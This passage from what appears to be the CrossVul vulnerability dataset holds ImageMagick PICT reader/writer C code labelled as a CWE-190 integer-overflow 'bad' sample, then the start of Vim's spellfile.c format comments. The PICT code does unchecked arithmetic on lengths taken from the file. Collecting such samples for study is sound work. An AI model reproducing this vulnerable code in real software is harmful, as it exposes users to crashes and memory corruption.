SetPixelBlue(tile_image,ScaleCharToQuantum(
*(p+3*tile_image->columns)),q);
}
}
p++;
q+=GetPixelChannels(tile_image);
}
if (SyncAuthenticPixels(tile_image,exception) == MagickFalse)
break;
if ((tile_image->storage_class == DirectClass) &&
(pixmap.bits_per_pixel != 16))
{
p+=(pixmap.component_count-1)*tile_image->columns;
if (p < pixels)
break;
}
status=SetImageProgress(image,LoadImageTag,y,tile_image->rows);
if (status == MagickFalse)
break;
}
pixels=(unsigned char *) RelinquishMagickMemory(pixels);
if (jpeg == MagickFalse)
if ((code == 0x9a) || (code == 0x9b) ||
((bytes_per_line & 0x8000) != 0))
(void) CompositeImage(image,tile_image,CopyCompositeOp,
MagickTrue,destination.left,destination.top,exception);
tile_image=DestroyImage(tile_image);
break;
}
case 0xa1:
{
unsigned char
*info;
size_t
type;
/*
Comment.
*/
type=ReadBlobMSBShort(image);
length=ReadBlobMSBShort(image);
if (length == 0)
break;
(void) ReadBlobMSBLong(image);
length-=4;
if (length == 0)
break;
info=(unsigned char *) AcquireQuantumMemory(length,sizeof(*info));
if (info == (unsigned char *) NULL)
break;
count=ReadBlob(image,length,info);
if (count != (ssize_t) length)
ThrowReaderException(ResourceLimitError,"UnableToReadImageData");
switch (type)
{
case 0xe0:
{
if (length == 0)
break;
profile=BlobToStringInfo((const void *) NULL,length);
SetStringInfoDatum(profile,info);
status=SetImageProfile(image,"icc",profile,exception);
profile=DestroyStringInfo(profile);
if (status == MagickFalse)
ThrowReaderException(ResourceLimitError,
"MemoryAllocationFailed");
break;
}
case 0x1f2:
{
if (length == 0)
break;
profile=BlobToStringInfo((const void *) NULL,length);
SetStringInfoDatum(profile,info);
status=SetImageProfile(image,"iptc",profile,exception);
if (status == MagickFalse)
ThrowReaderException(ResourceLimitError,
"MemoryAllocationFailed");
profile=DestroyStringInfo(profile);
break;
}
default:
break;
}
info=(unsigned char *) RelinquishMagickMemory(info);
break;
}
default:
{
/*
Skip to next op code.
*/
if (code < 0)
break;
if (codes[code].length == -1)
(void) ReadBlobMSBShort(image);
else
for (i=0; i < (ssize_t) codes[code].length; i++)
if (ReadBlobByte(image) == EOF)
break;
}
}
}
if (code == 0xc00)
{
/*
Skip header.
*/
for (i=0; i < 24; i++)
if (ReadBlobByte(image) == EOF)
break;
continue;
}
if (((code >= 0xb0) && (code <= 0xcf)) ||
((code >= 0x8000) && (code <= 0x80ff)))
continue;
if (code == 0x8200)
{
FILE
*file;
Image
*tile_image;
ImageInfo
*read_info;
int
unique_file;
/*
Embedded JPEG.
*/
jpeg=MagickTrue;
read_info=CloneImageInfo(image_info);
SetImageInfoBlob(read_info,(void *) NULL,0);
file=(FILE *) NULL;
unique_file=AcquireUniqueFileResource(read_info->filename);
if (unique_file != -1)
file=fdopen(unique_file,"wb");
if ((unique_file == -1) || (file == (FILE *) NULL))
{
(void) RelinquishUniqueFileResource(read_info->filename);
(void) CopyMagickString(image->filename,read_info->filename,
MagickPathExtent);
ThrowFileException(exception,FileOpenError,
"UnableToCreateTemporaryFile",image->filename);
image=DestroyImageList(image);
return((Image *) NULL);
}
length=ReadBlobMSBLong(image);
if (length > 154)
{
for (i=0; i < 6; i++)
(void) ReadBlobMSBLong(image);
if (ReadRectangle(image,&frame) == MagickFalse)
{
(void) fclose(file);
(void) RelinquishUniqueFileResource(read_info->filename);
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
}
for (i=0; i < 122; i++)
if (ReadBlobByte(image) == EOF)
break;
for (i=0; i < (ssize_t) (length-154); i++)
{
c=ReadBlobByte(image);
if (c == EOF)
break;
(void) fputc(c,file);
}
}
(void) fclose(file);
(void) close(unique_file);
tile_image=ReadImage(read_info,exception);
(void) RelinquishUniqueFileResource(read_info->filename);
read_info=DestroyImageInfo(read_info);
if (tile_image == (Image *) NULL)
continue;
(void) FormatLocaleString(geometry,MagickPathExtent,"%.20gx%.20g",
(double) MagickMax(image->columns,tile_image->columns),
(double) MagickMax(image->rows,tile_image->rows));
(void) SetImageExtent(image,
MagickMax(image->columns,tile_image->columns),
MagickMax(image->rows,tile_image->rows),exception);
(void) TransformImageColorspace(image,tile_image->colorspace,exception);
(void) CompositeImage(image,tile_image,CopyCompositeOp,MagickTrue,
frame.left,frame.right,exception);
image->compression=tile_image->compression;
tile_image=DestroyImage(tile_image);
continue;
}
if ((code == 0xff) || (code == 0xffff))
break;
if (((code >= 0xd0) && (code <= 0xfe)) ||
((code >= 0x8100) && (code <= 0xffff)))
{
/*
Skip reserved.
*/
length=ReadBlobMSBShort(image);
for (i=0; i < (ssize_t) length; i++)
if (ReadBlobByte(image) == EOF)
break;
continue;
}
if ((code >= 0x100) && (code <= 0x7fff))
{
/*
Skip reserved.
*/
length=(size_t) ((code >> 7) & 0xff);
for (i=0; i < (ssize_t) length; i++)
if (ReadBlobByte(image) == EOF)
break;
continue;
}
}
(void) CloseBlob(image);
return(GetFirstImageInList(image));
}
#endif
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% R e g i s t e r P I C T I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% RegisterPICTImage() adds attributes for the PICT image format to
% the list of supported formats. The attributes include the image format
% tag, a method to read and/or write the format, whether the format
% supports the saving of more than one frame to the same file or blob,
% whether the format supports native in-memory I/O, and a brief
% description of the format.
%
% The format of the RegisterPICTImage method is:
%
% size_t RegisterPICTImage(void)
%
*/
ModuleExport size_t RegisterPICTImage(void)
{
MagickInfo
*entry;
entry=AcquireMagickInfo("PICT","PCT","Apple Macintosh QuickDraw/PICT");
entry->decoder=(DecodeImageHandler *) ReadPICTImage;
entry->encoder=(EncodeImageHandler *) WritePICTImage;
entry->flags^=CoderAdjoinFlag;
entry->flags|=CoderSeekableStreamFlag;
entry->magick=(IsImageFormatHandler *) IsPICT;
(void) RegisterMagickInfo(entry);
entry=AcquireMagickInfo("PICT","PICT","Apple Macintosh QuickDraw/PICT");
entry->decoder=(DecodeImageHandler *) ReadPICTImage;
entry->encoder=(EncodeImageHandler *) WritePICTImage;
entry->flags^=CoderAdjoinFlag;
entry->flags|=CoderSeekableStreamFlag;
entry->magick=(IsImageFormatHandler *) IsPICT;
(void) RegisterMagickInfo(entry);
return(MagickImageCoderSignature);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% U n r e g i s t e r P I C T I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% UnregisterPICTImage() removes format registrations made by the
% PICT module from the list of supported formats.
%
% The format of the UnregisterPICTImage method is:
%
% UnregisterPICTImage(void)
%
*/
ModuleExport void UnregisterPICTImage(void)
{
(void) UnregisterMagickInfo("PCT");
(void) UnregisterMagickInfo("PICT");
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% W r i t e P I C T I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% WritePICTImage() writes an image to a file in the Apple Macintosh
% QuickDraw/PICT image format.
%
% The format of the WritePICTImage method is:
%
% MagickBooleanType WritePICTImage(const ImageInfo *image_info,
% Image *image,ExceptionInfo *exception)
%
% A description of each parameter follows.
%
% o image_info: the image info.
%
% o image: The image.
%
% o exception: return any errors or warnings in this structure.
%
*/
static MagickBooleanType WritePICTImage(const ImageInfo *image_info,
Image *image,ExceptionInfo *exception)
{
#define MaxCount 128
#define PictCropRegionOp 0x01
#define PictEndOfPictureOp 0xff
#define PictJPEGOp 0x8200
#define PictInfoOp 0x0C00
#define PictInfoSize 512
#define PictPixmapOp 0x9A
#define PictPICTOp 0x98
#define PictVersion 0x11
const StringInfo
*profile;
double
x_resolution,
y_resolution;
MagickBooleanType
status;
MagickOffsetType
offset;
PICTPixmap
pixmap;
PICTRectangle
bounds,
crop_rectangle,
destination_rectangle,
frame_rectangle,
size_rectangle,
source_rectangle;
register const Quantum
*p;
register ssize_t
i,
x;
size_t
bytes_per_line,
count,
storage_class;
ssize_t
y;
unsigned char
*buffer,
*packed_scanline,
*scanline;
unsigned short
base_address,
row_bytes,
transfer_mode;
/*
Open output image file.
*/
assert(image_info != (const ImageInfo *) NULL);
assert(image_info->signature == MagickSignature);
assert(image != (Image *) NULL);
assert(image->signature == MagickSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if ((image->columns > 65535L) || (image->rows > 65535L))
ThrowWriterException(ImageError,"WidthOrHeightExceedsLimit");
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickSignature);
status=OpenBlob(image_info,image,WriteBinaryBlobMode,exception);
if (status == MagickFalse)
return(status);
(void) TransformImageColorspace(image,sRGBColorspace,exception);
/*
Initialize image info.
*/
size_rectangle.top=0;
size_rectangle.left=0;
size_rectangle.bottom=(short) image->rows;
size_rectangle.right=(short) image->columns;
frame_rectangle=size_rectangle;
crop_rectangle=size_rectangle;
source_rectangle=size_rectangle;
destination_rectangle=size_rectangle;
base_address=0xff;
row_bytes=(unsigned short) (image->columns | 0x8000);
bounds.top=0;
bounds.left=0;
bounds.bottom=(short) image->rows;
bounds.right=(short) image->columns;
pixmap.version=0;
pixmap.pack_type=0;
pixmap.pack_size=0;
pixmap.pixel_type=0;
pixmap.bits_per_pixel=8;
pixmap.component_count=1;
pixmap.component_size=8;
pixmap.plane_bytes=0;
pixmap.table=0;
pixmap.reserved=0;
transfer_mode=0;
x_resolution=image->resolution.x != 0.0 ? image->resolution.x :
DefaultResolution;
y_resolution=image->resolution.y != 0.0 ? image->resolution.y :
DefaultResolution;
storage_class=image->storage_class;
if (image_info->compression == JPEGCompression)
storage_class=DirectClass;
if (storage_class == DirectClass)
{
pixmap.component_count=image->alpha_trait != UndefinedPixelTrait ? 4 : 3;
pixmap.pixel_type=16;
pixmap.bits_per_pixel=32;
pixmap.pack_type=0x04;
transfer_mode=0x40;
row_bytes=(unsigned short) ((4*image->columns) | 0x8000);
}
/*
Allocate memory.
*/
bytes_per_line=image->columns;
if (storage_class == DirectClass)
bytes_per_line*=image->alpha_trait != UndefinedPixelTrait ? 4 : 3;
buffer=(unsigned char *) AcquireQuantumMemory(PictInfoSize,sizeof(*buffer));
packed_scanline=(unsigned char *) AcquireQuantumMemory((size_t)
(row_bytes+MaxCount),sizeof(*packed_scanline));
scanline=(unsigned char *) AcquireQuantumMemory(row_bytes,sizeof(*scanline));
if ((buffer == (unsigned char *) NULL) ||
(packed_scanline == (unsigned char *) NULL) ||
(scanline == (unsigned char *) NULL))
ThrowWriterException(ResourceLimitError,"MemoryAllocationFailed");
(void) ResetMagickMemory(scanline,0,row_bytes);
(void) ResetMagickMemory(packed_scanline,0,(size_t) (row_bytes+MaxCount));
/*
Write header, header size, size bounding box, version, and reserved.
*/
(void) ResetMagickMemory(buffer,0,PictInfoSize);
(void) WriteBlob(image,PictInfoSize,buffer);
(void) WriteBlobMSBShort(image,0);
(void) WriteBlobMSBShort(image,(unsigned short) size_rectangle.top);
(void) WriteBlobMSBShort(image,(unsigned short) size_rectangle.left);
(void) WriteBlobMSBShort(image,(unsigned short) size_rectangle.bottom);
(void) WriteBlobMSBShort(image,(unsigned short) size_rectangle.right);
(void) WriteBlobMSBShort(image,PictVersion);
(void) WriteBlobMSBShort(image,0x02ff); /* version #2 */
(void) WriteBlobMSBShort(image,PictInfoOp);
(void) WriteBlobMSBLong(image,0xFFFE0000UL);
/*
Write full size of the file, resolution, frame bounding box, and reserved.
*/
(void) WriteBlobMSBShort(image,(unsigned short) x_resolution);
(void) WriteBlobMSBShort(image,0x0000);
(void) WriteBlobMSBShort(image,(unsigned short) y_resolution);
(void) WriteBlobMSBShort(image,0x0000);
(void) WriteBlobMSBShort(image,(unsigned short) frame_rectangle.top);
(void) WriteBlobMSBShort(image,(unsigned short) frame_rectangle.left);
(void) WriteBlobMSBShort(image,(unsigned short) frame_rectangle.bottom);
(void) WriteBlobMSBShort(image,(unsigned short) frame_rectangle.right);
(void) WriteBlobMSBLong(image,0x00000000L);
profile=GetImageProfile(image,"iptc");
if (profile != (StringInfo *) NULL)
{
(void) WriteBlobMSBShort(image,0xa1);
(void) WriteBlobMSBShort(image,0x1f2);
(void) WriteBlobMSBShort(image,(unsigned short)
(GetStringInfoLength(profile)+4));
(void) WriteBlobString(image,"8BIM");
(void) WriteBlob(image,GetStringInfoLength(profile),
GetStringInfoDatum(profile));
}
profile=GetImageProfile(image,"icc");
if (profile != (StringInfo *) NULL)
{
(void) WriteBlobMSBShort(image,0xa1);
(void) WriteBlobMSBShort(image,0xe0);
(void) WriteBlobMSBShort(image,(unsigned short)
(GetStringInfoLength(profile)+4));
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlob(image,GetStringInfoLength(profile),
GetStringInfoDatum(profile));
(void) WriteBlobMSBShort(image,0xa1);
(void) WriteBlobMSBShort(image,0xe0);
(void) WriteBlobMSBShort(image,4);
(void) WriteBlobMSBLong(image,0x00000002UL);
}
/*
Write crop region opcode and crop bounding box.
*/
(void) WriteBlobMSBShort(image,PictCropRegionOp);
(void) WriteBlobMSBShort(image,0xa);
(void) WriteBlobMSBShort(image,(unsigned short) crop_rectangle.top);
(void) WriteBlobMSBShort(image,(unsigned short) crop_rectangle.left);
(void) WriteBlobMSBShort(image,(unsigned short) crop_rectangle.bottom);
(void) WriteBlobMSBShort(image,(unsigned short) crop_rectangle.right);
if (image_info->compression == JPEGCompression)
{
Image
*jpeg_image;
ImageInfo
*jpeg_info;
size_t
length;
unsigned char
*blob;
jpeg_image=CloneImage(image,0,0,MagickTrue,exception);
if (jpeg_image == (Image *) NULL)
{
(void) CloseBlob(image);
return(MagickFalse);
}
jpeg_info=CloneImageInfo(image_info);
(void) CopyMagickString(jpeg_info->magick,"JPEG",MagickPathExtent);
length=0;
blob=(unsigned char *) ImageToBlob(jpeg_info,jpeg_image,&length,
exception);
jpeg_info=DestroyImageInfo(jpeg_info);
if (blob == (unsigned char *) NULL)
return(MagickFalse);
jpeg_image=DestroyImage(jpeg_image);
(void) WriteBlobMSBShort(image,PictJPEGOp);
(void) WriteBlobMSBLong(image,(unsigned int) length+154);
(void) WriteBlobMSBShort(image,0x0000);
(void) WriteBlobMSBLong(image,0x00010000UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x00010000UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x40000000UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x00400000UL);
(void) WriteBlobMSBShort(image,0x0000);
(void) WriteBlobMSBShort(image,(unsigned short) image->rows);
(void) WriteBlobMSBShort(image,(unsigned short) image->columns);
(void) WriteBlobMSBShort(image,0x0000);
(void) WriteBlobMSBShort(image,768);
(void) WriteBlobMSBShort(image,0x0000);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x00566A70UL);
(void) WriteBlobMSBLong(image,0x65670000UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x00000001UL);
(void) WriteBlobMSBLong(image,0x00016170UL);
(void) WriteBlobMSBLong(image,0x706C0000UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBShort(image,768);
(void) WriteBlobMSBShort(image,(unsigned short) image->columns);
(void) WriteBlobMSBShort(image,(unsigned short) image->rows);
(void) WriteBlobMSBShort(image,(unsigned short) x_resolution);
(void) WriteBlobMSBShort(image,0x0000);
(void) WriteBlobMSBShort(image,(unsigned short) y_resolution);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x87AC0001UL);
(void) WriteBlobMSBLong(image,0x0B466F74UL);
(void) WriteBlobMSBLong(image,0x6F202D20UL);
(void) WriteBlobMSBLong(image,0x4A504547UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x0018FFFFUL);
(void) WriteBlob(image,length,blob);
if ((length & 0x01) != 0)
(void) WriteBlobByte(image,'\0');
blob=(unsigned char *) RelinquishMagickMemory(blob);
}
/*
Write picture opcode, row bytes, and picture bounding box, and version.
*/
if (storage_class == PseudoClass)
(void) WriteBlobMSBShort(image,PictPICTOp);
else
{
(void) WriteBlobMSBShort(image,PictPixmapOp);
(void) WriteBlobMSBLong(image,(size_t) base_address);
}
(void) WriteBlobMSBShort(image,(unsigned short) (row_bytes | 0x8000));
(void) WriteBlobMSBShort(image,(unsigned short) bounds.top);
(void) WriteBlobMSBShort(image,(unsigned short) bounds.left);
(void) WriteBlobMSBShort(image,(unsigned short) bounds.bottom);
(void) WriteBlobMSBShort(image,(unsigned short) bounds.right);
/*
Write pack type, pack size, resolution, pixel type, and pixel size.
*/
(void) WriteBlobMSBShort(image,(unsigned short) pixmap.version);
(void) WriteBlobMSBShort(image,(unsigned short) pixmap.pack_type);
(void) WriteBlobMSBLong(image,(unsigned int) pixmap.pack_size);
(void) WriteBlobMSBShort(image,(unsigned short) (x_resolution+0.5));
(void) WriteBlobMSBShort(image,0x0000);
(void) WriteBlobMSBShort(image,(unsigned short) (y_resolution+0.5));
(void) WriteBlobMSBShort(image,0x0000);
(void) WriteBlobMSBShort(image,(unsigned short) pixmap.pixel_type);
(void) WriteBlobMSBShort(image,(unsigned short) pixmap.bits_per_pixel);
/*
Write component count, size, plane bytes, table size, and reserved.
*/
(void) WriteBlobMSBShort(image,(unsigned short) pixmap.component_count);
(void) WriteBlobMSBShort(image,(unsigned short) pixmap.component_size);
(void) WriteBlobMSBLong(image,(unsigned int) pixmap.plane_bytes);
(void) WriteBlobMSBLong(image,(unsigned int) pixmap.table);
(void) WriteBlobMSBLong(image,(unsigned int) pixmap.reserved);
if (storage_class == PseudoClass)
{
/*
Write image colormap.
*/
(void) WriteBlobMSBLong(image,0x00000000L); /* color seed */
(void) WriteBlobMSBShort(image,0L); /* color flags */
(void) WriteBlobMSBShort(image,(unsigned short) (image->colors-1));
for (i=0; i < (ssize_t) image->colors; i++)
{
(void) WriteBlobMSBShort(image,(unsigned short) i);
(void) WriteBlobMSBShort(image,ScaleQuantumToShort(
image->colormap[i].red));
(void) WriteBlobMSBShort(image,ScaleQuantumToShort(
image->colormap[i].green));
(void) WriteBlobMSBShort(image,ScaleQuantumToShort(
image->colormap[i].blue));
}
}
/*
Write source and destination rectangle.
*/
(void) WriteBlobMSBShort(image,(unsigned short) source_rectangle.top);
(void) WriteBlobMSBShort(image,(unsigned short) source_rectangle.left);
(void) WriteBlobMSBShort(image,(unsigned short) source_rectangle.bottom);
(void) WriteBlobMSBShort(image,(unsigned short) source_rectangle.right);
(void) WriteBlobMSBShort(image,(unsigned short) destination_rectangle.top);
(void) WriteBlobMSBShort(image,(unsigned short) destination_rectangle.left);
(void) WriteBlobMSBShort(image,(unsigned short) destination_rectangle.bottom);
(void) WriteBlobMSBShort(image,(unsigned short) destination_rectangle.right);
(void) WriteBlobMSBShort(image,(unsigned short) transfer_mode);
/*
Write picture data.
*/
count=0;
if (storage_class == PseudoClass)
for (y=0; y < (ssize_t) image->rows; y++)
{
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
for (x=0; x < (ssize_t) image->columns; x++)
{
scanline[x]=(unsigned char) GetPixelIndex(image,p);
p+=GetPixelChannels(image);
}
count+=EncodeImage(image,scanline,(size_t) (row_bytes & 0x7FFF),
packed_scanline);
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
}
else
if (image_info->compression == JPEGCompression)
{
(void) ResetMagickMemory(scanline,0,row_bytes);
for (y=0; y < (ssize_t) image->rows; y++)
count+=EncodeImage(image,scanline,(size_t) (row_bytes & 0x7FFF),
packed_scanline);
}
else
{
register unsigned char
*blue,
*green,
*opacity,
*red;
red=scanline;
green=scanline+image->columns;
blue=scanline+2*image->columns;
opacity=scanline+3*image->columns;
for (y=0; y < (ssize_t) image->rows; y++)
{
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
red=scanline;
green=scanline+image->columns;
blue=scanline+2*image->columns;
if (image->alpha_trait != UndefinedPixelTrait)
{
opacity=scanline;
red=scanline+image->columns;
green=scanline+2*image->columns;
blue=scanline+3*image->columns;
}
for (x=0; x < (ssize_t) image->columns; x++)
{
*red++=ScaleQuantumToChar(GetPixelRed(image,p));
*green++=ScaleQuantumToChar(GetPixelGreen(image,p));
*blue++=ScaleQuantumToChar(GetPixelBlue(image,p));
if (image->alpha_trait != UndefinedPixelTrait)
*opacity++=ScaleQuantumToChar((Quantum) (GetPixelAlpha(image,p)));
p+=GetPixelChannels(image);
}
count+=EncodeImage(image,scanline,bytes_per_line & 0x7FFF,
packed_scanline);
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
}
}
if ((count & 0x01) != 0)
(void) WriteBlobByte(image,'\0');
(void) WriteBlobMSBShort(image,PictEndOfPictureOp);
offset=TellBlob(image);
offset=SeekBlob(image,512,SEEK_SET);
(void) WriteBlobMSBShort(image,(unsigned short) offset);
scanline=(unsigned char *) RelinquishMagickMemory(scanline);
packed_scanline=(unsigned char *) RelinquishMagickMemory(packed_scanline);
buffer=(unsigned char *) RelinquishMagickMemory(buffer);
(void) CloseBlob(image);
return(MagickTrue);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_1834_6 |
crossvul-cpp_data_bad_3153_0 | /* vi:set ts=8 sts=4 sw=4 noet:
*
* VIM - Vi IMproved by Bram Moolenaar
*
* Do ":help uganda" in Vim to read copying and usage conditions.
* Do ":help credits" in Vim to see a list of people who contributed.
* See README.txt for an overview of the Vim source code.
*/
/*
* spellfile.c: code for reading and writing spell files.
*
* See spell.c for information about spell checking.
*/
/*
* Vim spell file format: <HEADER>
* <SECTIONS>
* <LWORDTREE>
* <KWORDTREE>
* <PREFIXTREE>
*
* <HEADER>: <fileID> <versionnr>
*
* <fileID> 8 bytes "VIMspell"
* <versionnr> 1 byte VIMSPELLVERSION
*
*
* Sections make it possible to add information to the .spl file without
* making it incompatible with previous versions. There are two kinds of
* sections:
* 1. Not essential for correct spell checking. E.g. for making suggestions.
* These are skipped when not supported.
* 2. Optional information, but essential for spell checking when present.
* E.g. conditions for affixes. When this section is present but not
* supported an error message is given.
*
* <SECTIONS>: <section> ... <sectionend>
*
* <section>: <sectionID> <sectionflags> <sectionlen> (section contents)
*
* <sectionID> 1 byte number from 0 to 254 identifying the section
*
* <sectionflags> 1 byte SNF_REQUIRED: this section is required for correct
* spell checking
*
* <sectionlen> 4 bytes length of section contents, MSB first
*
* <sectionend> 1 byte SN_END
*
*
* sectionID == SN_INFO: <infotext>
* <infotext> N bytes free format text with spell file info (version,
* website, etc)
*
* sectionID == SN_REGION: <regionname> ...
* <regionname> 2 bytes Up to 8 region names: ca, au, etc. Lower case.
* First <regionname> is region 1.
*
* sectionID == SN_CHARFLAGS: <charflagslen> <charflags>
* <folcharslen> <folchars>
* <charflagslen> 1 byte Number of bytes in <charflags> (should be 128).
* <charflags> N bytes List of flags (first one is for character 128):
* 0x01 word character CF_WORD
* 0x02 upper-case character CF_UPPER
* <folcharslen> 2 bytes Number of bytes in <folchars>.
* <folchars> N bytes Folded characters, first one is for character 128.
*
* sectionID == SN_MIDWORD: <midword>
* <midword> N bytes Characters that are word characters only when used
* in the middle of a word.
*
* sectionID == SN_PREFCOND: <prefcondcnt> <prefcond> ...
* <prefcondcnt> 2 bytes Number of <prefcond> items following.
* <prefcond> : <condlen> <condstr>
* <condlen> 1 byte Length of <condstr>.
* <condstr> N bytes Condition for the prefix.
*
* sectionID == SN_REP: <repcount> <rep> ...
* <repcount> 2 bytes number of <rep> items, MSB first.
* <rep> : <repfromlen> <repfrom> <reptolen> <repto>
* <repfromlen> 1 byte length of <repfrom>
* <repfrom> N bytes "from" part of replacement
* <reptolen> 1 byte length of <repto>
* <repto> N bytes "to" part of replacement
*
* sectionID == SN_REPSAL: <repcount> <rep> ...
* just like SN_REP but for soundfolded words
*
* sectionID == SN_SAL: <salflags> <salcount> <sal> ...
* <salflags> 1 byte flags for soundsalike conversion:
* SAL_F0LLOWUP
* SAL_COLLAPSE
* SAL_REM_ACCENTS
* <salcount> 2 bytes number of <sal> items following
* <sal> : <salfromlen> <salfrom> <saltolen> <salto>
* <salfromlen> 1 byte length of <salfrom>
* <salfrom> N bytes "from" part of soundsalike
* <saltolen> 1 byte length of <salto>
* <salto> N bytes "to" part of soundsalike
*
* sectionID == SN_SOFO: <sofofromlen> <sofofrom> <sofotolen> <sofoto>
* <sofofromlen> 2 bytes length of <sofofrom>
* <sofofrom> N bytes "from" part of soundfold
* <sofotolen> 2 bytes length of <sofoto>
* <sofoto> N bytes "to" part of soundfold
*
* sectionID == SN_SUGFILE: <timestamp>
* <timestamp> 8 bytes time in seconds that must match with .sug file
*
* sectionID == SN_NOSPLITSUGS: nothing
*
* sectionID == SN_NOCOMPOUNDSUGS: nothing
*
* sectionID == SN_WORDS: <word> ...
* <word> N bytes NUL terminated common word
*
* sectionID == SN_MAP: <mapstr>
* <mapstr> N bytes String with sequences of similar characters,
* separated by slashes.
*
* sectionID == SN_COMPOUND: <compmax> <compminlen> <compsylmax> <compoptions>
* <comppatcount> <comppattern> ... <compflags>
* <compmax> 1 byte Maximum nr of words in compound word.
* <compminlen> 1 byte Minimal word length for compounding.
* <compsylmax> 1 byte Maximum nr of syllables in compound word.
* <compoptions> 2 bytes COMP_ flags.
* <comppatcount> 2 bytes number of <comppattern> following
* <compflags> N bytes Flags from COMPOUNDRULE items, separated by
* slashes.
*
* <comppattern>: <comppatlen> <comppattext>
* <comppatlen> 1 byte length of <comppattext>
* <comppattext> N bytes end or begin chars from CHECKCOMPOUNDPATTERN
*
* sectionID == SN_NOBREAK: (empty, its presence is what matters)
*
* sectionID == SN_SYLLABLE: <syllable>
* <syllable> N bytes String from SYLLABLE item.
*
* <LWORDTREE>: <wordtree>
*
* <KWORDTREE>: <wordtree>
*
* <PREFIXTREE>: <wordtree>
*
*
* <wordtree>: <nodecount> <nodedata> ...
*
* <nodecount> 4 bytes Number of nodes following. MSB first.
*
* <nodedata>: <siblingcount> <sibling> ...
*
* <siblingcount> 1 byte Number of siblings in this node. The siblings
* follow in sorted order.
*
* <sibling>: <byte> [ <nodeidx> <xbyte>
* | <flags> [<flags2>] [<region>] [<affixID>]
* | [<pflags>] <affixID> <prefcondnr> ]
*
* <byte> 1 byte Byte value of the sibling. Special cases:
* BY_NOFLAGS: End of word without flags and for all
* regions.
* For PREFIXTREE <affixID> and
* <prefcondnr> follow.
* BY_FLAGS: End of word, <flags> follow.
* For PREFIXTREE <pflags>, <affixID>
* and <prefcondnr> follow.
* BY_FLAGS2: End of word, <flags> and <flags2>
* follow. Not used in PREFIXTREE.
* BY_INDEX: Child of sibling is shared, <nodeidx>
* and <xbyte> follow.
*
* <nodeidx> 3 bytes Index of child for this sibling, MSB first.
*
* <xbyte> 1 byte byte value of the sibling.
*
* <flags> 1 byte bitmask of:
* WF_ALLCAP word must have only capitals
* WF_ONECAP first char of word must be capital
* WF_KEEPCAP keep-case word
* WF_FIXCAP keep-case word, all caps not allowed
* WF_RARE rare word
* WF_BANNED bad word
* WF_REGION <region> follows
* WF_AFX <affixID> follows
*
* <flags2> 1 byte Bitmask of:
* WF_HAS_AFF >> 8 word includes affix
* WF_NEEDCOMP >> 8 word only valid in compound
* WF_NOSUGGEST >> 8 word not used for suggestions
* WF_COMPROOT >> 8 word already a compound
* WF_NOCOMPBEF >> 8 no compounding before this word
* WF_NOCOMPAFT >> 8 no compounding after this word
*
* <pflags> 1 byte bitmask of:
* WFP_RARE rare prefix
* WFP_NC non-combining prefix
* WFP_UP letter after prefix made upper case
*
* <region> 1 byte Bitmask for regions in which word is valid. When
* omitted it's valid in all regions.
* Lowest bit is for region 1.
*
* <affixID> 1 byte ID of affix that can be used with this word. In
* PREFIXTREE used for the required prefix ID.
*
* <prefcondnr> 2 bytes Prefix condition number, index in <prefcond> list
* from HEADER.
*
* All text characters are in 'encoding', but stored as single bytes.
*/
/*
* Vim .sug file format: <SUGHEADER>
* <SUGWORDTREE>
* <SUGTABLE>
*
* <SUGHEADER>: <fileID> <versionnr> <timestamp>
*
* <fileID> 6 bytes "VIMsug"
* <versionnr> 1 byte VIMSUGVERSION
* <timestamp> 8 bytes timestamp that must match with .spl file
*
*
